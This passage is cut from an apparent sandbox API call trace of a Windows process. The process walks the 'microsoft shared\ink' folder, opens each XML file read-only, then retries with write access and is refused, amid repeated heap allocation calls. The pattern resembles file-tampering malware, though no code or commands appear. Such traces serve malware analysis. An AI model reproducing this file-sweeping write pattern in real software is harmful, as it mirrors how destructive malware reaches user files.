lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0100.157] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.157] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.157] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa24, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipssrl.xml", cAlternateFileName="")) returned 1 [0100.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0100.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0100.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0100.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0100.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0100.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0100.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0100.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0100.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0100.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0100.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0100.157] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.158] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.158] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.158] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0100.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.158] AreFileApisANSI () returned 1 [0100.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml", lpUsedDefaultChar=0x0) returned 62 [0100.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0100.158] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.158] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0100.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.158] AreFileApisANSI () returned 1 [0100.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e1c8 [0100.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6e1c8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml") returned 62 [0100.158] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.158] GetFileType (hFile=0x368) returned 0x1 [0100.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0100.158] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.159] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.159] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.159] CloseHandle (hObject=0x368) returned 1 [0100.159] AreFileApisANSI () returned 1 [0100.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e470 [0100.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6e470, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml") returned 62 [0100.159] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.159] GetLastError () returned 0x5 [0100.159] GetLastError () returned 0x5 [0100.159] SetLastError (dwErrCode=0x5) [0100.159] GetLastError () returned 0x5 [0100.159] SetLastError (dwErrCode=0x5) [0100.159] GetLastError () returned 0x5 [0100.159] SetLastError (dwErrCode=0x5) [0100.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0100.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0100.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0100.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.160] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9d8, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipssve.xml", cAlternateFileName="")) returned 1 [0100.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0100.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0100.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0100.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0100.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0100.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0100.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0100.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0100.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0100.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0100.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0100.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.161] AreFileApisANSI () returned 1 [0100.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml", lpUsedDefaultChar=0x0) returned 62 [0100.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0100.161] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.161] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.161] AreFileApisANSI () returned 1 [0100.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e718 [0100.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e718, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml") returned 62 [0100.161] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.161] GetFileType (hFile=0x368) returned 0x1 [0100.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0100.161] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.162] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.162] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.162] CloseHandle (hObject=0x368) returned 1 [0100.162] AreFileApisANSI () returned 1 [0100.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6df20 [0100.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml") returned 62 [0100.162] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.162] GetLastError () returned 0x5 [0100.162] GetLastError () returned 0x5 [0100.162] SetLastError (dwErrCode=0x5) [0100.162] GetLastError () returned 0x5 [0100.162] SetLastError (dwErrCode=0x5) [0100.162] GetLastError () returned 0x5 [0100.162] SetLastError (dwErrCode=0x5) [0100.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0100.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0100.163] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.163] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.163] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xaa0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipstr.xml", cAlternateFileName="")) returned 1 [0100.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0100.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0100.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0100.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0100.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0100.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0100.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0100.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0100.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0100.163] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.163] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.163] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.163] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.164] AreFileApisANSI () returned 1 [0100.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml", lpUsedDefaultChar=0x0) returned 61 [0100.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0100.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0100.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.164] AreFileApisANSI () returned 1 [0100.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0100.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e718 [0100.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6e718, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml") returned 61 [0100.164] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipstr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.164] GetFileType (hFile=0x368) returned 0x1 [0100.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0100.164] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.165] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.165] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.165] CloseHandle (hObject=0x368) returned 1 [0100.165] AreFileApisANSI () returned 1 [0100.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0100.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e030 [0100.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml") returned 61 [0100.165] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipstr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.165] GetLastError () returned 0x5 [0100.165] GetLastError () returned 0x5 [0100.165] SetLastError (dwErrCode=0x5) [0100.165] GetLastError () returned 0x5 [0100.165] SetLastError (dwErrCode=0x5) [0100.165] GetLastError () returned 0x5 [0100.165] SetLastError (dwErrCode=0x5) [0100.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0100.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0100.166] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.166] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.166] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 